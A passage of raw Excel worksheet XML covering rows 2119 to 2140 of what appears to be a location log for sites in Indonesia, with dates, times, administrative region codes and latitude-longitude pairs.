      </c>
      <c r="V2119" s="5" t="s">
        <v>16335</v>
      </c>
      <c r="W2119" s="5">
        <v>-626669</v>
      </c>
      <c r="X2119" t="s">
        <v>20077</v>
      </c>
      <c r="Y2119" t="str">
        <f t="shared" si="33"/>
        <v>-6.26669,106.83227</v>
      </c>
    </row>
    <row r="2120" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2120">
        <v>190636</v>
      </c>
      <c r="B2120" s="1">
        <v>43961</v>
      </c>
      <c r="C2120" s="2">
        <v>0.40416666666666662</v>
      </c>
      <c r="D2120" t="s">
        <v>2648</v>
      </c>
      <c r="E2120" t="s">
        <v>23</v>
      </c>
      <c r="G2120" t="s">
        <v>7083</v>
      </c>
      <c r="H2120" t="s">
        <v>26</v>
      </c>
      <c r="J2120" t="s">
        <v>6963</v>
      </c>
      <c r="L2120" t="s">
        <v>7084</v>
      </c>
      <c r="M2120">
        <v>3171020007</v>
      </c>
      <c r="N2120">
        <v>3171020</v>
      </c>
      <c r="O2120">
        <v>3171</v>
      </c>
      <c r="P2120">
        <v>31</v>
      </c>
      <c r="Q2120" t="s">
        <v>5778</v>
      </c>
      <c r="R2120" t="s">
        <v>484</v>
      </c>
      <c r="S2120" t="s">
        <v>108</v>
      </c>
      <c r="T2120" t="s">
        <v>33</v>
      </c>
      <c r="U2120" s="5">
        <v>10684676</v>
      </c>
      <c r="V2120" s="5" t="s">
        <v>16336</v>
      </c>
      <c r="W2120" s="5">
        <v>-629162</v>
      </c>
      <c r="X2120" t="s">
        <v>20063</v>
      </c>
      <c r="Y2120" t="str">
        <f t="shared" si="33"/>
        <v>-6.29162,106.84676</v>
      </c>
    </row>
    <row r="2121" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2121">
        <v>191076</v>
      </c>
      <c r="B2121" s="1">
        <v>43968</v>
      </c>
      <c r="C2121" s="2">
        <v>0.90238425925925936</v>
      </c>
      <c r="D2121" t="s">
        <v>22</v>
      </c>
      <c r="E2121" t="s">
        <v>23</v>
      </c>
      <c r="F2121" t="s">
        <v>7085</v>
      </c>
      <c r="H2121" t="s">
        <v>7086</v>
      </c>
      <c r="I2121" t="s">
        <v>7087</v>
      </c>
      <c r="J2121" t="s">
        <v>6061</v>
      </c>
      <c r="L2121" t="s">
        <v>7088</v>
      </c>
      <c r="M2121">
        <v>3173080003</v>
      </c>
      <c r="N2121">
        <v>3173080</v>
      </c>
      <c r="O2121">
        <v>3173</v>
      </c>
      <c r="P2121">
        <v>31</v>
      </c>
      <c r="Q2121" t="s">
        <v>157</v>
      </c>
      <c r="R2121" t="s">
        <v>157</v>
      </c>
      <c r="S2121" t="s">
        <v>62</v>
      </c>
      <c r="T2121" t="s">
        <v>33</v>
      </c>
      <c r="U2121" s="5">
        <v>10683136</v>
      </c>
      <c r="V2121" s="5" t="s">
        <v>16337</v>
      </c>
      <c r="W2121" s="5">
        <v>-617523</v>
      </c>
      <c r="X2121" t="s">
        <v>19030</v>
      </c>
      <c r="Y2121" t="str">
        <f t="shared" si="33"/>
        <v>-6.17523,106.83136</v>
      </c>
    </row>
    <row r="2122" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2122">
        <v>191078</v>
      </c>
      <c r="B2122" s="1">
        <v>43969</v>
      </c>
      <c r="C2122" s="2">
        <v>9.4687499999999994E-2</v>
      </c>
      <c r="D2122" t="s">
        <v>22</v>
      </c>
      <c r="E2122" t="s">
        <v>23</v>
      </c>
      <c r="F2122" t="s">
        <v>7089</v>
      </c>
      <c r="G2122" t="s">
        <v>7090</v>
      </c>
      <c r="H2122" t="s">
        <v>26</v>
      </c>
      <c r="I2122" t="s">
        <v>137</v>
      </c>
      <c r="J2122" t="s">
        <v>6712</v>
      </c>
      <c r="M2122">
        <v>1971030015</v>
      </c>
      <c r="N2122">
        <v>1971030</v>
      </c>
      <c r="O2122">
        <v>1971</v>
      </c>
      <c r="P2122">
        <v>19</v>
      </c>
      <c r="Q2122" t="s">
        <v>7091</v>
      </c>
      <c r="R2122" t="s">
        <v>7092</v>
      </c>
      <c r="S2122" t="s">
        <v>7093</v>
      </c>
      <c r="T2122" t="s">
        <v>6718</v>
      </c>
      <c r="U2122" s="5">
        <v>10611527</v>
      </c>
      <c r="V2122" s="5" t="s">
        <v>16338</v>
      </c>
      <c r="W2122" s="5">
        <v>-211141</v>
      </c>
      <c r="X2122" t="s">
        <v>20094</v>
      </c>
      <c r="Y2122" t="str">
        <f t="shared" si="33"/>
        <v>-2.11141,106.11527</v>
      </c>
    </row>
    <row r="2123" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2123">
        <v>191081</v>
      </c>
      <c r="B2123" s="1">
        <v>43969</v>
      </c>
      <c r="C2123" s="2">
        <v>0.3705092592592592</v>
      </c>
      <c r="D2123" t="s">
        <v>22</v>
      </c>
      <c r="E2123" t="s">
        <v>23</v>
      </c>
      <c r="F2123" t="s">
        <v>7094</v>
      </c>
      <c r="G2123" t="s">
        <v>7095</v>
      </c>
      <c r="H2123" t="s">
        <v>26</v>
      </c>
      <c r="I2123" t="s">
        <v>137</v>
      </c>
      <c r="J2123" t="s">
        <v>7096</v>
      </c>
      <c r="L2123" t="s">
        <v>7097</v>
      </c>
      <c r="M2123">
        <v>3171080001</v>
      </c>
      <c r="N2123">
        <v>3171080</v>
      </c>
      <c r="O2123">
        <v>3171</v>
      </c>
      <c r="P2123">
        <v>31</v>
      </c>
      <c r="Q2123" t="s">
        <v>2265</v>
      </c>
      <c r="R2123" t="s">
        <v>1403</v>
      </c>
      <c r="S2123" t="s">
        <v>108</v>
      </c>
      <c r="T2123" t="s">
        <v>33</v>
      </c>
      <c r="U2123" s="5">
        <v>10684528</v>
      </c>
      <c r="V2123" s="5" t="s">
        <v>16339</v>
      </c>
      <c r="W2123" s="5">
        <v>-626118</v>
      </c>
      <c r="X2123" t="s">
        <v>20095</v>
      </c>
      <c r="Y2123" t="str">
        <f t="shared" si="33"/>
        <v>-6.26118,106.84528</v>
      </c>
    </row>
    <row r="2124" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2124">
        <v>191082</v>
      </c>
      <c r="B2124" s="1">
        <v>43969</v>
      </c>
      <c r="C2124" s="2">
        <v>0.49747685185185181</v>
      </c>
      <c r="D2124" t="s">
        <v>22</v>
      </c>
      <c r="E2124" t="s">
        <v>23</v>
      </c>
      <c r="F2124" t="s">
        <v>7098</v>
      </c>
      <c r="G2124" t="s">
        <v>7099</v>
      </c>
      <c r="H2124" t="s">
        <v>26</v>
      </c>
      <c r="I2124" t="s">
        <v>137</v>
      </c>
      <c r="J2124" t="s">
        <v>6626</v>
      </c>
      <c r="L2124" t="s">
        <v>7100</v>
      </c>
      <c r="M2124">
        <v>7371111001</v>
      </c>
      <c r="N2124">
        <v>7371111</v>
      </c>
      <c r="O2124">
        <v>7371</v>
      </c>
      <c r="P2124">
        <v>73</v>
      </c>
      <c r="Q2124" t="s">
        <v>7101</v>
      </c>
      <c r="R2124" t="s">
        <v>7102</v>
      </c>
      <c r="S2124" t="s">
        <v>6629</v>
      </c>
      <c r="T2124" t="s">
        <v>6630</v>
      </c>
      <c r="U2124" s="5">
        <v>11948718</v>
      </c>
      <c r="V2124" s="5" t="s">
        <v>16340</v>
      </c>
      <c r="W2124" s="5">
        <v>-512589</v>
      </c>
      <c r="X2124" t="s">
        <v>20096</v>
      </c>
      <c r="Y2124" t="str">
        <f t="shared" si="33"/>
        <v>-5.12589,119.48718</v>
      </c>
    </row>
    <row r="2125" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2125">
        <v>191083</v>
      </c>
      <c r="B2125" s="1">
        <v>43969</v>
      </c>
      <c r="C2125" s="2">
        <v>0.50620370370370371</v>
      </c>
      <c r="D2125" t="s">
        <v>22</v>
      </c>
      <c r="E2125" t="s">
        <v>23</v>
      </c>
      <c r="F2125" t="s">
        <v>7103</v>
      </c>
      <c r="G2125" t="s">
        <v>7104</v>
      </c>
      <c r="H2125" t="s">
        <v>26</v>
      </c>
      <c r="I2125" t="s">
        <v>137</v>
      </c>
      <c r="J2125" t="s">
        <v>2627</v>
      </c>
      <c r="L2125" t="s">
        <v>7105</v>
      </c>
      <c r="M2125">
        <v>3216070014</v>
      </c>
      <c r="N2125">
        <v>3216070</v>
      </c>
      <c r="O2125">
        <v>3216</v>
      </c>
      <c r="P2125">
        <v>32</v>
      </c>
      <c r="Q2125" t="s">
        <v>5478</v>
      </c>
      <c r="R2125" t="s">
        <v>5479</v>
      </c>
      <c r="S2125" t="s">
        <v>41</v>
      </c>
      <c r="T2125" t="s">
        <v>42</v>
      </c>
      <c r="U2125" s="5">
        <v>10709702</v>
      </c>
      <c r="V2125" s="5" t="s">
        <v>16341</v>
      </c>
      <c r="W2125" s="5">
        <v>-625531</v>
      </c>
      <c r="X2125" t="s">
        <v>20097</v>
      </c>
      <c r="Y2125" t="str">
        <f t="shared" si="33"/>
        <v>-6.25531,107.09702</v>
      </c>
    </row>
    <row r="2126" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2126">
        <v>191084</v>
      </c>
      <c r="B2126" s="1">
        <v>43969</v>
      </c>
      <c r="C2126" s="2">
        <v>0.58899305555555559</v>
      </c>
      <c r="D2126" t="s">
        <v>22</v>
      </c>
      <c r="E2126" t="s">
        <v>23</v>
      </c>
      <c r="F2126" t="s">
        <v>7106</v>
      </c>
      <c r="H2126" t="s">
        <v>26</v>
      </c>
      <c r="I2126" t="s">
        <v>137</v>
      </c>
      <c r="J2126" t="s">
        <v>2627</v>
      </c>
      <c r="L2126" t="s">
        <v>7107</v>
      </c>
      <c r="M2126">
        <v>3201190010</v>
      </c>
      <c r="N2126">
        <v>3201190</v>
      </c>
      <c r="O2126">
        <v>3201</v>
      </c>
      <c r="P2126">
        <v>32</v>
      </c>
      <c r="Q2126" t="s">
        <v>419</v>
      </c>
      <c r="R2126" t="s">
        <v>420</v>
      </c>
      <c r="S2126" t="s">
        <v>421</v>
      </c>
      <c r="T2126" t="s">
        <v>42</v>
      </c>
      <c r="U2126" s="5">
        <v>10697828</v>
      </c>
      <c r="V2126" s="5" t="s">
        <v>16342</v>
      </c>
      <c r="W2126" s="5">
        <v>-631464</v>
      </c>
      <c r="X2126" t="s">
        <v>20098</v>
      </c>
      <c r="Y2126" t="str">
        <f t="shared" si="33"/>
        <v>-6.31464,106.97828</v>
      </c>
    </row>
    <row r="2127" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2127">
        <v>191085</v>
      </c>
      <c r="B2127" s="1">
        <v>43969</v>
      </c>
      <c r="C2127" s="2">
        <v>0.61340277777777774</v>
      </c>
      <c r="D2127" t="s">
        <v>22</v>
      </c>
      <c r="E2127" t="s">
        <v>23</v>
      </c>
      <c r="F2127" t="s">
        <v>7108</v>
      </c>
      <c r="G2127" t="s">
        <v>7109</v>
      </c>
      <c r="H2127" t="s">
        <v>26</v>
      </c>
      <c r="I2127" t="s">
        <v>137</v>
      </c>
      <c r="J2127" t="s">
        <v>2627</v>
      </c>
      <c r="L2127" t="s">
        <v>7110</v>
      </c>
      <c r="M2127">
        <v>3201190010</v>
      </c>
      <c r="N2127">
        <v>3201190</v>
      </c>
      <c r="O2127">
        <v>3201</v>
      </c>
      <c r="P2127">
        <v>32</v>
      </c>
      <c r="Q2127" t="s">
        <v>419</v>
      </c>
      <c r="R2127" t="s">
        <v>420</v>
      </c>
      <c r="S2127" t="s">
        <v>421</v>
      </c>
      <c r="T2127" t="s">
        <v>42</v>
      </c>
      <c r="U2127" s="5">
        <v>10697306</v>
      </c>
      <c r="V2127" s="5" t="s">
        <v>16343</v>
      </c>
      <c r="W2127" s="5">
        <v>-631944</v>
      </c>
      <c r="X2127" t="s">
        <v>19303</v>
      </c>
      <c r="Y2127" t="str">
        <f t="shared" si="33"/>
        <v>-6.31944,106.97306</v>
      </c>
    </row>
    <row r="2128" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2128">
        <v>191088</v>
      </c>
      <c r="B2128" s="1">
        <v>43969</v>
      </c>
      <c r="C2128" s="2">
        <v>0.64265046296296291</v>
      </c>
      <c r="D2128" t="s">
        <v>22</v>
      </c>
      <c r="E2128" t="s">
        <v>23</v>
      </c>
      <c r="F2128" t="s">
        <v>7111</v>
      </c>
      <c r="H2128" t="s">
        <v>26</v>
      </c>
      <c r="I2128" t="s">
        <v>137</v>
      </c>
      <c r="J2128" t="s">
        <v>2627</v>
      </c>
      <c r="L2128" t="s">
        <v>7112</v>
      </c>
      <c r="M2128">
        <v>3275040005</v>
      </c>
      <c r="N2128">
        <v>3275040</v>
      </c>
      <c r="O2128">
        <v>3275</v>
      </c>
      <c r="P2128">
        <v>32</v>
      </c>
      <c r="Q2128" t="s">
        <v>2956</v>
      </c>
      <c r="R2128" t="s">
        <v>100</v>
      </c>
      <c r="S2128" t="s">
        <v>41</v>
      </c>
      <c r="T2128" t="s">
        <v>42</v>
      </c>
      <c r="U2128" s="5">
        <v>10700462</v>
      </c>
      <c r="V2128" s="5" t="s">
        <v>16344</v>
      </c>
      <c r="W2128" s="5">
        <v>-625023</v>
      </c>
      <c r="X2128" t="s">
        <v>20099</v>
      </c>
      <c r="Y2128" t="str">
        <f t="shared" si="33"/>
        <v>-6.25023,107.00462</v>
      </c>
    </row>
    <row r="2129" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2129">
        <v>191093</v>
      </c>
      <c r="B2129" s="1">
        <v>43969</v>
      </c>
      <c r="C2129" s="2">
        <v>0.65562500000000001</v>
      </c>
      <c r="D2129" t="s">
        <v>22</v>
      </c>
      <c r="E2129" t="s">
        <v>23</v>
      </c>
      <c r="F2129" t="s">
        <v>7113</v>
      </c>
      <c r="G2129" t="s">
        <v>7114</v>
      </c>
      <c r="H2129" t="s">
        <v>26</v>
      </c>
      <c r="I2129" t="s">
        <v>137</v>
      </c>
      <c r="J2129" t="s">
        <v>2627</v>
      </c>
      <c r="L2129" t="s">
        <v>7115</v>
      </c>
      <c r="M2129">
        <v>3201190010</v>
      </c>
      <c r="N2129">
        <v>3201190</v>
      </c>
      <c r="O2129">
        <v>3201</v>
      </c>
      <c r="P2129">
        <v>32</v>
      </c>
      <c r="Q2129" t="s">
        <v>419</v>
      </c>
      <c r="R2129" t="s">
        <v>420</v>
      </c>
      <c r="S2129" t="s">
        <v>421</v>
      </c>
      <c r="T2129" t="s">
        <v>42</v>
      </c>
      <c r="U2129" s="5">
        <v>10696938</v>
      </c>
      <c r="V2129" s="5" t="s">
        <v>14988</v>
      </c>
      <c r="W2129" s="5">
        <v>-630744</v>
      </c>
      <c r="X2129" t="s">
        <v>20100</v>
      </c>
      <c r="Y2129" t="str">
        <f t="shared" si="33"/>
        <v>-6.30744,106.96938</v>
      </c>
    </row>
    <row r="2130" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2130">
        <v>191094</v>
      </c>
      <c r="B2130" s="1">
        <v>43969</v>
      </c>
      <c r="C2130" s="2">
        <v>0.6850694444444444</v>
      </c>
      <c r="D2130" t="s">
        <v>22</v>
      </c>
      <c r="E2130" t="s">
        <v>23</v>
      </c>
      <c r="F2130" t="s">
        <v>7116</v>
      </c>
      <c r="H2130" t="s">
        <v>26</v>
      </c>
      <c r="I2130" t="s">
        <v>137</v>
      </c>
      <c r="J2130" t="s">
        <v>2627</v>
      </c>
      <c r="L2130" t="s">
        <v>7117</v>
      </c>
      <c r="M2130">
        <v>3275040005</v>
      </c>
      <c r="N2130">
        <v>3275040</v>
      </c>
      <c r="O2130">
        <v>3275</v>
      </c>
      <c r="P2130">
        <v>32</v>
      </c>
      <c r="Q2130" t="s">
        <v>2956</v>
      </c>
      <c r="R2130" t="s">
        <v>100</v>
      </c>
      <c r="S2130" t="s">
        <v>41</v>
      </c>
      <c r="T2130" t="s">
        <v>42</v>
      </c>
      <c r="U2130" s="5">
        <v>10700444</v>
      </c>
      <c r="V2130" s="5" t="s">
        <v>16345</v>
      </c>
      <c r="W2130" s="5">
        <v>-624775</v>
      </c>
      <c r="X2130" t="s">
        <v>19522</v>
      </c>
      <c r="Y2130" t="str">
        <f t="shared" si="33"/>
        <v>-6.24775,107.00444</v>
      </c>
    </row>
    <row r="2131" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2131">
        <v>191096</v>
      </c>
      <c r="B2131" s="1">
        <v>43969</v>
      </c>
      <c r="C2131" s="2">
        <v>0.71234953703703707</v>
      </c>
      <c r="D2131" t="s">
        <v>22</v>
      </c>
      <c r="E2131" t="s">
        <v>23</v>
      </c>
      <c r="F2131" t="s">
        <v>7118</v>
      </c>
      <c r="G2131" t="s">
        <v>7119</v>
      </c>
      <c r="H2131" t="s">
        <v>26</v>
      </c>
      <c r="I2131" t="s">
        <v>1055</v>
      </c>
      <c r="J2131" t="s">
        <v>2627</v>
      </c>
      <c r="L2131" t="s">
        <v>7120</v>
      </c>
      <c r="M2131">
        <v>3201190010</v>
      </c>
      <c r="N2131">
        <v>3201190</v>
      </c>
      <c r="O2131">
        <v>3201</v>
      </c>
      <c r="P2131">
        <v>32</v>
      </c>
      <c r="Q2131" t="s">
        <v>419</v>
      </c>
      <c r="R2131" t="s">
        <v>420</v>
      </c>
      <c r="S2131" t="s">
        <v>421</v>
      </c>
      <c r="T2131" t="s">
        <v>42</v>
      </c>
      <c r="U2131" s="5">
        <v>10697683</v>
      </c>
      <c r="V2131" s="5" t="s">
        <v>16346</v>
      </c>
      <c r="W2131" s="5">
        <v>-631370</v>
      </c>
      <c r="X2131" t="s">
        <v>20101</v>
      </c>
      <c r="Y2131" t="str">
        <f t="shared" si="33"/>
        <v>-6.31370,106.97683</v>
      </c>
    </row>
    <row r="2132" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2132">
        <v>191097</v>
      </c>
      <c r="B2132" s="1">
        <v>43969</v>
      </c>
      <c r="C2132" s="2">
        <v>0.80621527777777768</v>
      </c>
      <c r="D2132" t="s">
        <v>22</v>
      </c>
      <c r="E2132" t="s">
        <v>23</v>
      </c>
      <c r="F2132" t="s">
        <v>7121</v>
      </c>
      <c r="G2132" t="s">
        <v>7122</v>
      </c>
      <c r="H2132" t="s">
        <v>26</v>
      </c>
      <c r="I2132" t="s">
        <v>137</v>
      </c>
      <c r="J2132" t="s">
        <v>2627</v>
      </c>
      <c r="L2132" t="s">
        <v>7123</v>
      </c>
      <c r="M2132">
        <v>3276011002</v>
      </c>
      <c r="N2132">
        <v>3276011</v>
      </c>
      <c r="O2132">
        <v>3276</v>
      </c>
      <c r="P2132">
        <v>32</v>
      </c>
      <c r="Q2132" t="s">
        <v>6641</v>
      </c>
      <c r="R2132" t="s">
        <v>6642</v>
      </c>
      <c r="S2132" t="s">
        <v>185</v>
      </c>
      <c r="T2132" t="s">
        <v>42</v>
      </c>
      <c r="U2132" s="5">
        <v>10673690</v>
      </c>
      <c r="V2132" s="5" t="s">
        <v>16347</v>
      </c>
      <c r="W2132" s="5">
        <v>-642410</v>
      </c>
      <c r="X2132" t="s">
        <v>20102</v>
      </c>
      <c r="Y2132" t="str">
        <f t="shared" si="33"/>
        <v>-6.42410,106.73690</v>
      </c>
    </row>
    <row r="2133" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2133">
        <v>191098</v>
      </c>
      <c r="B2133" s="1">
        <v>43969</v>
      </c>
      <c r="C2133" s="2">
        <v>0.8064930555555555</v>
      </c>
      <c r="D2133" t="s">
        <v>22</v>
      </c>
      <c r="E2133" t="s">
        <v>23</v>
      </c>
      <c r="F2133" t="s">
        <v>7124</v>
      </c>
      <c r="G2133" t="s">
        <v>7125</v>
      </c>
      <c r="H2133" t="s">
        <v>26</v>
      </c>
      <c r="I2133" t="s">
        <v>137</v>
      </c>
      <c r="J2133" t="s">
        <v>2627</v>
      </c>
      <c r="L2133" t="s">
        <v>7126</v>
      </c>
      <c r="M2133">
        <v>3201300010</v>
      </c>
      <c r="N2133">
        <v>3201300</v>
      </c>
      <c r="O2133">
        <v>3201</v>
      </c>
      <c r="P2133">
        <v>32</v>
      </c>
      <c r="Q2133" t="s">
        <v>7127</v>
      </c>
      <c r="R2133" t="s">
        <v>7127</v>
      </c>
      <c r="S2133" t="s">
        <v>421</v>
      </c>
      <c r="T2133" t="s">
        <v>42</v>
      </c>
      <c r="U2133" s="5">
        <v>10657104</v>
      </c>
      <c r="V2133" s="5" t="s">
        <v>16348</v>
      </c>
      <c r="W2133" s="5">
        <v>-633975</v>
      </c>
      <c r="X2133" t="s">
        <v>20103</v>
      </c>
      <c r="Y2133" t="str">
        <f t="shared" si="33"/>
        <v>-6.33975,106.57104</v>
      </c>
    </row>
    <row r="2134" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2134">
        <v>191099</v>
      </c>
      <c r="B2134" s="1">
        <v>43969</v>
      </c>
      <c r="C2134" s="2">
        <v>0.81137731481481479</v>
      </c>
      <c r="D2134" t="s">
        <v>22</v>
      </c>
      <c r="E2134" t="s">
        <v>23</v>
      </c>
      <c r="F2134" t="s">
        <v>7128</v>
      </c>
      <c r="G2134" t="s">
        <v>7129</v>
      </c>
      <c r="H2134" t="s">
        <v>26</v>
      </c>
      <c r="I2134" t="s">
        <v>137</v>
      </c>
      <c r="J2134" t="s">
        <v>2627</v>
      </c>
      <c r="L2134" t="s">
        <v>7130</v>
      </c>
      <c r="M2134">
        <v>3276011002</v>
      </c>
      <c r="N2134">
        <v>3276011</v>
      </c>
      <c r="O2134">
        <v>3276</v>
      </c>
      <c r="P2134">
        <v>32</v>
      </c>
      <c r="Q2134" t="s">
        <v>6641</v>
      </c>
      <c r="R2134" t="s">
        <v>6642</v>
      </c>
      <c r="S2134" t="s">
        <v>185</v>
      </c>
      <c r="T2134" t="s">
        <v>42</v>
      </c>
      <c r="U2134" s="5">
        <v>10673645</v>
      </c>
      <c r="V2134" s="5" t="s">
        <v>16297</v>
      </c>
      <c r="W2134" s="5">
        <v>-642063</v>
      </c>
      <c r="X2134" t="s">
        <v>20104</v>
      </c>
      <c r="Y2134" t="str">
        <f t="shared" si="33"/>
        <v>-6.42063,106.73645</v>
      </c>
    </row>
    <row r="2135" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2135">
        <v>191100</v>
      </c>
      <c r="B2135" s="1">
        <v>43969</v>
      </c>
      <c r="C2135" s="2">
        <v>0.82280092592592602</v>
      </c>
      <c r="D2135" t="s">
        <v>22</v>
      </c>
      <c r="E2135" t="s">
        <v>23</v>
      </c>
      <c r="F2135" t="s">
        <v>7131</v>
      </c>
      <c r="G2135" t="s">
        <v>7132</v>
      </c>
      <c r="H2135" t="s">
        <v>26</v>
      </c>
      <c r="I2135" t="s">
        <v>137</v>
      </c>
      <c r="J2135" t="s">
        <v>3180</v>
      </c>
      <c r="L2135" t="s">
        <v>7133</v>
      </c>
      <c r="M2135">
        <v>3172060008</v>
      </c>
      <c r="N2135">
        <v>3172060</v>
      </c>
      <c r="O2135">
        <v>3172</v>
      </c>
      <c r="P2135">
        <v>31</v>
      </c>
      <c r="Q2135" t="s">
        <v>1096</v>
      </c>
      <c r="R2135" t="s">
        <v>48</v>
      </c>
      <c r="S2135" t="s">
        <v>49</v>
      </c>
      <c r="T2135" t="s">
        <v>33</v>
      </c>
      <c r="U2135" s="5">
        <v>10685757</v>
      </c>
      <c r="V2135" s="5" t="s">
        <v>16349</v>
      </c>
      <c r="W2135" s="5">
        <v>-621446</v>
      </c>
      <c r="X2135" t="s">
        <v>20105</v>
      </c>
      <c r="Y2135" t="str">
        <f t="shared" si="33"/>
        <v>-6.21446,106.85757</v>
      </c>
    </row>
    <row r="2136" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2136">
        <v>191101</v>
      </c>
      <c r="B2136" s="1">
        <v>43969</v>
      </c>
      <c r="C2136" s="2">
        <v>0.82437499999999997</v>
      </c>
      <c r="D2136" t="s">
        <v>22</v>
      </c>
      <c r="E2136" t="s">
        <v>23</v>
      </c>
      <c r="F2136" t="s">
        <v>7134</v>
      </c>
      <c r="G2136" t="s">
        <v>7135</v>
      </c>
      <c r="H2136" t="s">
        <v>26</v>
      </c>
      <c r="I2136" t="s">
        <v>137</v>
      </c>
      <c r="J2136" t="s">
        <v>3180</v>
      </c>
      <c r="L2136" t="s">
        <v>7136</v>
      </c>
      <c r="M2136">
        <v>3172060008</v>
      </c>
      <c r="N2136">
        <v>3172060</v>
      </c>
      <c r="O2136">
        <v>3172</v>
      </c>
      <c r="P2136">
        <v>31</v>
      </c>
      <c r="Q2136" t="s">
        <v>1096</v>
      </c>
      <c r="R2136" t="s">
        <v>48</v>
      </c>
      <c r="S2136" t="s">
        <v>49</v>
      </c>
      <c r="T2136" t="s">
        <v>33</v>
      </c>
      <c r="U2136" s="5">
        <v>10685760</v>
      </c>
      <c r="V2136" s="5" t="s">
        <v>15227</v>
      </c>
      <c r="W2136" s="5">
        <v>-621447</v>
      </c>
      <c r="X2136" t="s">
        <v>20106</v>
      </c>
      <c r="Y2136" t="str">
        <f t="shared" si="33"/>
        <v>-6.21447,106.85760</v>
      </c>
    </row>
    <row r="2137" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2137">
        <v>191102</v>
      </c>
      <c r="B2137" s="1">
        <v>43969</v>
      </c>
      <c r="C2137" s="2">
        <v>0.99236111111111114</v>
      </c>
      <c r="D2137" t="s">
        <v>2648</v>
      </c>
      <c r="E2137" t="s">
        <v>23</v>
      </c>
      <c r="G2137" t="s">
        <v>7137</v>
      </c>
      <c r="H2137" t="s">
        <v>26</v>
      </c>
      <c r="J2137" t="s">
        <v>7138</v>
      </c>
      <c r="L2137" t="s">
        <v>7139</v>
      </c>
      <c r="M2137">
        <v>3171030001</v>
      </c>
      <c r="N2137">
        <v>3171030</v>
      </c>
      <c r="O2137">
        <v>3171</v>
      </c>
      <c r="P2137">
        <v>31</v>
      </c>
      <c r="Q2137" t="s">
        <v>363</v>
      </c>
      <c r="R2137" t="s">
        <v>364</v>
      </c>
      <c r="S2137" t="s">
        <v>108</v>
      </c>
      <c r="T2137" t="s">
        <v>33</v>
      </c>
      <c r="U2137" s="5">
        <v>10676933</v>
      </c>
      <c r="V2137" s="5" t="s">
        <v>16350</v>
      </c>
      <c r="W2137" s="5">
        <v>-629106</v>
      </c>
      <c r="X2137" t="s">
        <v>20107</v>
      </c>
      <c r="Y2137" t="str">
        <f t="shared" si="33"/>
        <v>-6.29106,106.76933</v>
      </c>
    </row>
    <row r="2138" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2138">
        <v>191095</v>
      </c>
      <c r="B2138" s="1">
        <v>43970</v>
      </c>
      <c r="C2138" s="2">
        <v>1.2881944444444446E-2</v>
      </c>
      <c r="D2138" t="s">
        <v>85</v>
      </c>
      <c r="E2138" t="s">
        <v>23</v>
      </c>
      <c r="F2138" t="s">
        <v>7140</v>
      </c>
      <c r="G2138" t="s">
        <v>7141</v>
      </c>
      <c r="H2138" t="s">
        <v>26</v>
      </c>
      <c r="J2138" t="s">
        <v>409</v>
      </c>
      <c r="K2138" t="s">
        <v>7142</v>
      </c>
      <c r="L2138" t="s">
        <v>7143</v>
      </c>
      <c r="M2138">
        <v>3171040003</v>
      </c>
      <c r="N2138">
        <v>3171040</v>
      </c>
      <c r="O2138">
        <v>3171</v>
      </c>
      <c r="P2138">
        <v>31</v>
      </c>
      <c r="Q2138" t="s">
        <v>411</v>
      </c>
      <c r="R2138" t="s">
        <v>163</v>
      </c>
      <c r="S2138" t="s">
        <v>108</v>
      </c>
      <c r="T2138" t="s">
        <v>33</v>
      </c>
      <c r="U2138" s="5">
        <v>10676456</v>
      </c>
      <c r="V2138" s="5" t="s">
        <v>16351</v>
      </c>
      <c r="W2138" s="5">
        <v>-624654</v>
      </c>
      <c r="X2138" t="s">
        <v>20108</v>
      </c>
      <c r="Y2138" t="str">
        <f t="shared" si="33"/>
        <v>-6.24654,106.76456</v>
      </c>
    </row>
    <row r="2139" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2139">
        <v>191132</v>
      </c>
      <c r="B2139" s="1">
        <v>43970</v>
      </c>
      <c r="C2139" s="2">
        <v>0.2902777777777778</v>
      </c>
      <c r="D2139" t="s">
        <v>2648</v>
      </c>
      <c r="E2139" t="s">
        <v>23</v>
      </c>
      <c r="G2139" t="s">
        <v>7144</v>
      </c>
      <c r="H2139" t="s">
        <v>26</v>
      </c>
      <c r="J2139" t="s">
        <v>2627</v>
      </c>
      <c r="L2139" t="s">
        <v>7145</v>
      </c>
      <c r="M2139">
        <v>3276040011</v>
      </c>
      <c r="N2139">
        <v>3276040</v>
      </c>
      <c r="O2139">
        <v>3276</v>
      </c>
      <c r="P2139">
        <v>32</v>
      </c>
      <c r="Q2139" t="s">
        <v>7146</v>
      </c>
      <c r="R2139" t="s">
        <v>1821</v>
      </c>
      <c r="S2139" t="s">
        <v>185</v>
      </c>
      <c r="T2139" t="s">
        <v>42</v>
      </c>
      <c r="U2139" s="5">
        <v>10687165</v>
      </c>
      <c r="V2139" s="5" t="s">
        <v>14805</v>
      </c>
      <c r="W2139" s="5">
        <v>-635385</v>
      </c>
      <c r="X2139" t="s">
        <v>20109</v>
      </c>
      <c r="Y2139" t="str">
        <f t="shared" si="33"/>
        <v>-6.35385,106.87165</v>
      </c>
    </row>
    <row r="2140" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2140">
        <v>191163</v>
      </c>
      <c r="B2140" s="1">
        <v>43970</v>
      </c>
      <c r="C2140" s="2">
        <v>0.58263888888888882</v>
      </c>
      <c r="D2140" t="s">
        <v>2648</v>
      </c>
      <c r="E2140" t="s">
        <v>23</v>
      </c>
      <c r="G2140" t="s">
        <v>7147</v>
      </c>
      <c r="H2140" t="s">
        <v>26</v>
      </c>
      <c r="J2140" t="s">
        <v>530</v>
      </c>
